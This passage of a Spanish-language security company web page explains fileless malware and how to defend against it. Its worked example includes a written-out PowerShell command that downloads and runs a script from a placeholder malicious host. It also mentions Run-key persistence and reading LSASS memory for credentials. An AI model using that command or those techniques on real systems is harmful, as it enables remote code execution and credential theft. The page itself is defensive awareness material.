memoria<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4f34f23 elementor-widget elementor-widget-text-editor\" data-id=\"4f34f23\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-6 rounded-lg shadow-sm\"><div class=\"bg-white p-6 rounded-lg shadow-sm\"><p class=\"text-sm text-scube-text\">Sin archivos en disco, cifran datos o minan criptomonedas (Cryptojacking).<\/p><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-5d9d3f9 e-con-full bdt-backdrop-filter-yes e-flex bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"5d9d3f9\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-69a74ef elementor-widget elementor-widget-heading\" data-id=\"69a74ef\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Puertas traseras persistentes<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-05b5adf elementor-widget elementor-widget-text-editor\" data-id=\"05b5adf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-6 rounded-lg shadow-sm\"><div class=\"bg-white p-6 rounded-lg shadow-sm\"><p class=\"text-sm text-scube-text\">Mediante la manipulaci\u00f3n de WMI o del registro del sistema.<\/p><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-1b18e6f e-con-full bdt-backdrop-filter-yes e-flex bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"1b18e6f\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-2e77df2 elementor-widget elementor-widget-heading\" data-id=\"2e77df2\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ataques complejos combinados<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-295c566 elementor-widget elementor-widget-text-editor\" data-id=\"295c566\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-6 rounded-lg shadow-sm\"><div class=\"grid md:grid-cols-2 gap-8\"><div class=\"bg-white p-6 rounded-lg shadow-sm\"><p class=\"text-sm text-scube-text\">Uso de shellcode o exploits que inyectan c\u00f3digo directamente a la memoria.<\/p><\/div><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-ba4374f e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"ba4374f\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-77098dc elementor-widget elementor-widget-spacer\" data-id=\"77098dc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-53d1906 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"53d1906\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-8dec3d5 elementor-widget elementor-widget-heading\" data-id=\"8dec3d5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ejemplo t\u00e9cnico: ataque fileless usando PowerShell<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-d34b089 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"d34b089\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-61c123c e-grid e-con-full wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"61c123c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-5e9f6bd e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"5e9f6bd\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-e250316 elementor-widget elementor-widget-text-editor\" data-id=\"e250316\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>1. Vector de entrada<\/strong><br \/>Un atacante env\u00eda un correo de phishing con un documento de Word que contiene una macro maliciosa. El usuario habilita las macros, iniciando la cadena de infecci\u00f3n.<\/p><p><strong>2. Ejecuci\u00f3n del payload<\/strong><br \/>La macro ejecuta un comando de PowerShell ofuscado que descarga y ejecuta c\u00f3digo directamente en memoria:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-70204c9 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"70204c9\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4a54fd5 elementor-widget elementor-widget-text-editor\" data-id=\"4a54fd5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span class=\"text-blue-400\" style=\"color: #0000ff;\">powershell<\/span>\u00a0<span style=\"color: #00ff00;\">-NoProfile -ExecutionPolicy Bypass -Command\u00a0<\/span><span class=\"text-yellow-300\" style=\"color: #ffff00;\">&#8220;IEX (New-Object Net.WebClient).DownloadStr ing (<\/span><span class=\"text-yellow-300\" style=\"color: #ffff00;\">&#8216;http:\/\/malicious-site.com\/payload.ps1&#8217;)&#8221;<\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-737f4c5 elementor-widget elementor-widget-text-editor\" data-id=\"737f4c5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><strong>3. Comportamiento en memoria<\/strong><\/p><ul><li>No se guarda en disco.<\/li><li>Se ejecuta directamente en RAM.<\/li><li>Utiliza funciones nativas como Invoke-Expression (IEX).<\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-8ad4348 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"8ad4348\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-e5ff67c e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"e5ff67c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-cea66a9 e-con-full bdt-backdrop-filter-yes e-flex bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"cea66a9\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-a2613e4 elementor-widget elementor-widget-heading\" data-id=\"a2613e4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Impacto y Persistencia\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-fb2acc3 elementor-widget elementor-widget-text-editor\" data-id=\"fb2acc3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"grid md:grid-cols-2 gap-8\"><div class=\"bg-white p-6 rounded-lg shadow-sm\"><ul><li><strong>Persistencia sin archivos<\/strong><br \/>Modifica el registro para ejecutarse al inicio sin dejar un ejecutable:<br \/>HKCU\\Software\\ Microsoft\\Windows\\ CurrentVersion \\Run<\/li><li><strong>Robo de credenciales<\/strong><br \/>Accede a la memoria del proceso LSASS.exe para extraer contrase\u00f1as en texto plano o hashes NTLM.<\/li><li><strong>Comando y control (C2)<\/strong><br \/>Abre un canal cifrado reverso hacia el servidor del atacante para recibir nuevas instrucciones o exfiltrar datos.<\/li><\/ul><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-bf18701 e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"bf18701\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-baacc55 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"baacc55\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-f5dc09f elementor-widget elementor-widget-heading\" data-id=\"f5dc09f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u00bfC\u00f3mo protegerse?\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-70db076 e-grid e-con-full wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"70db076\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-3501247 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"3501247\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-ea6ace4 elementor-widget elementor-widget-heading\" data-id=\"ea6ace4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Monitoreo de comportamiento en tiempo real\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7e81c65 elementor-widget elementor-widget-text-editor\" data-id=\"7e81c65\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text mb-4\">Los sistemas deben analizar eventos y comportamientos (no solo archivos), como ejecuciones inusuales de PowerShell o WMI.<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-fde3032 e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"fde3032\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-f01b751 elementor-widget elementor-widget-heading\" data-id=\"f01b751\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Habilitar registros y telemetr\u00eda avanzada\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7492613 elementor-widget elementor-widget-text-editor\" data-id=\"7492613\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text mb-4\">Activar registros detallados en PowerShell (script block logging, transcription) y en otras herramientas para capturar actividades sospechosas en memoria.<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-2bdf76c e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"2bdf76c\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-b1c9800 elementor-widget elementor-widget-heading\" data-id=\"b1c9800\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Implementar EDR \/ XDR\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d8ed22d elementor-widget elementor-widget-text-editor\" data-id=\"d8ed22d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text mb-4\">Las soluciones de Endpoint Detection and Response (EDR) detectan anomal\u00edas y relaciones entre procesos que pueden indicar ataques fileless.<\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-16829ba e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"16829ba\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-52617fd elementor-widget elementor-widget-heading\" data-id=\"52617fd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Restringir herramientas de administraci\u00f3n\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-c52d159 elementor-widget elementor-widget-text-editor\" data-id=\"c52d159\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><div class=\"grid md:grid-cols-2 lg:grid-cols-4 gap-6\"><div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text mb-4\">Usar pol\u00edticas como AppLocker, WDAC o control de aplicaciones para limitar c\u00f3mo se ejecutan scripts y procesos administrativos.<\/p><\/div><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-4d4015f e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"4d4015f\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-bc9f8c9 elementor-widget elementor-widget-heading\" data-id=\"bc9f8c9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Actualizar sistemas y parchear\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7fdd46d elementor-widget elementor-widget-text-editor\" data-id=\"7fdd46d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><div class=\"grid md:grid-cols-2 lg:grid-cols-4 gap-6\"><div class=\"bg-white p-8 rounded-xl shadow-lg border-l-4 border-scube-light hover:-translate-y-1 transition-transform duration-300\"><p class=\"text-scube-text mb-4\">Muchos ataques fileless requieren explotar vulnerabilidades conocidas para ejecutar comandos en memoria. Mantener sistemas al d\u00eda reduce este riesgo.<\/p><\/div><\/div><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-c0a3e8a e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"c0a3e8a\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-18a900b e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"18a900b\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;gradient&quot;}\">\n\t\t<div class=\"elementor-element elementor-element-5f66cfd e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"5f66cfd\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-8916542 elementor-widget elementor-widget-text-editor\" data-id=\"8916542\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p class=\"text-lg opacity-90 mb-8 relative z-10\">La clave para protegerse es un enfoque centrado en el an\u00e1lisis de comportamiento, visibilidad profunda de procesos y herramientas EDR\/XDR que puedan identificar actividad sospechosa en memoria en tiempo real.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-75d6b1c e-con-full e-flex wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"75d6b1c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-9c0b7d5 e-grid e-con-full bdt-backdrop-filter-yes bdt-filter-backdrop wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-child\" data-id=\"9c0b7d5\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-6ed0576 elementor-widget elementor-widget-eael-creative-button\" data-id=\"6ed0576\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"eael-creative-button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t        <div class=\"eael-creative-button-wrapper\">\n\n            <a class=\"eael-creative-button eael-creative-button--default eael-cb-icon-position-\" href=\"https:\/\/www.scube.com.gt\/index.php\/contacto\/\" data-text=\"\">\n            \t    \n                <div class=\"creative-button-inner\">\n\n                    \n                    <span class=\"cretive-button-text\">Solicita una auditor\u00eda de seguridad<\/span>\n\n                                    <\/div>\n\t                        <\/a>\n        <\/div>\n        \t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-2b99751 e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"2b99751\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-585e739 e-flex e-con-boxed wpr-particle-no wpr-jarallax-no wpr-parallax-no wpr-sticky-section-no wpr-column-slider-no wpr-equal-height-no e-con e-parent\" data-id=\"585e739\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;gradient&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-773734c elementor-widget elementor-widget-spacer\" data-id=\"773734c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-2d3bd20 elementor-widget elementor-widget-heading\" data-id=\"2d3bd20\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Suscr\u00edbete a nuestro newsletter<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-05d2bc1 elementor-widget elementor-widget-text-editor\" data-id=\"05d2bc1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"text-align: center;\">S\u00e9 el primero en recibir noticias, alertas y contenido clave sobre ciberseguridad. Descubre c\u00f3mo en <strong data-start=\"404\" data-end=\"413\">Scube<\/strong> ayudamos a las empresas a proteger sus activos digitales.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3a678df elementor-widget elementor-widget-metform\" data-id=\"3a678df\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"metform.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div id=\"mf-response-props-id-4617\" data-previous-steps-style=\"\" data-editswitchopen=\"\" data-response_type=\"alert\" data-erroricon=\"fas fa-exclamation-triangle\" data-successicon=\"fas fa-check\" data-messageposition=\"top\" class=\"   mf-scroll-top-no\">\n\t\t<div class=\"formpicker_warper formpicker_warper_editable\" data-metform-formpicker-key=\"4617\" >\n\t\t\t\t\n\t\t\t<div class=\"mf-widget-container\">\n\t\t\t\t\r\n\t\t<div\r\n\t\t\tid=\"metform-wrap-3a678df-4617\"\r\n\t\t\tclass=\"mf-form-wrapper\"\r\n\t\t\tdata-form-id=\"4617\"\r\n\t\t\tdata-action=\"https:\/\/www.scube.com.gt\/index.php\/wp-json\/metform\/v1\/entries\/insert\/4617\"\r\n\t\t\tdata-wp-nonce=\"163fef1bba\"\r\n\t\t\tdata-form-nonce=\"c0833e33df\"\r\n\t\t\tdata-quiz-summery = \"false\"\r\n\t\t\tdata-save-progress = \"false\"\r\n\t\t\tdata-form-type=\"general-form\"\r\n\t\t\tdata-stop-vertical-effect=\"\"\r\n\t\t\t><\/div>\r\n\r\n\r\n\t\t<!----------------------------- \r\n\t\t\t* controls_data : find the the props passed indie of data attribute\r\n\t\t\t* props.SubmitResponseMarkup : contains the markup of error or success message\r\n\t\t\t* https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Template_literals\r\n\t\t--------------------------- -->\r\n\r\n\t\t\t\t<script type=\"text\/mf\" class=\"mf-template\">\r\n\t\t\tfunction controls_data (value){\r\n\t\t\t\tlet currentWrapper = \"mf-response-props-id-4617\";\r\n\t\t\t\tlet currentEl = document.getElementById(currentWrapper);\r\n\t\t\t\t\r\n\t\t\t\treturn currentEl ? currentEl.dataset[value] : false\r\n\t\t\t}\r\n\r\n\r\n\t\t\tlet is_edit_mode = '' ? true : false;\r\n\t\t\tlet message_position = controls_data('messageposition') || 'top';\r\n\r\n\t\t\t\r\n\t\t\tlet message_successIcon = controls_data('successicon') || '';\r\n\t\t\tlet message_errorIcon = controls_data('erroricon') || '';\r\n\t\t\tlet message_editSwitch = controls_data('editswitchopen') === 'yes' ? true : false;\r\n\t\t\tlet message_proClass = controls_data('editswitchopen') === 'yes' ? 'mf_pro_activated' : '';\r\n\t\t\t\r\n\t\t\tlet is_dummy_markup = is_edit_mode && message_editSwitch ? true : false;\r\n\r\n\t\t\t\r\n\t\t\treturn html`\r\n\t\t\t\t<form\r\n\t\t\t\t\tclassName=\"metform-form-content\"\r\n\t\t\t\t\tref=${parent.formContainerRef}\r\n\t\t\t\t\tonSubmit=${ validation.handleSubmit( parent.handleFormSubmit ) }\r\n\t\t\t\t\r\n\t\t\t\t\t>\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\t\t${is_dummy_markup ? message_position === 'top' ?  props.ResponseDummyMarkup(message_successIcon, message_proClass) : '' : ''}\r\n\t\t\t\t\t${is_dummy_markup ? ' ' :  message_position === 'top' ? props.SubmitResponseMarkup`${parent}${state}${message_successIcon}${message_errorIcon}${message_proClass}` : ''}\r\n\r\n\t\t\t\t\t<!--------------------------------------------------------\r\n\t\t\t\t\t*** IMPORTANT \/ DANGEROUS ***\r\n\t\t\t\t\t${html``} must be used as in immediate child of \"metform-form-main-wrapper\"\r\n\t\t\t\t\tclass otherwise multistep form will not run at all\r\n\t\t\t\t\t---------------------------------------------------------->\r\n\r\n\t\t\t\t\t<div className=\"metform-form-main-wrapper\" key=${'hide-form-after-submit'} ref=${parent.formRef}>\r\n\t\t\t\t\t${html`\r\n\t\t\t\t\t\t\t\t<div 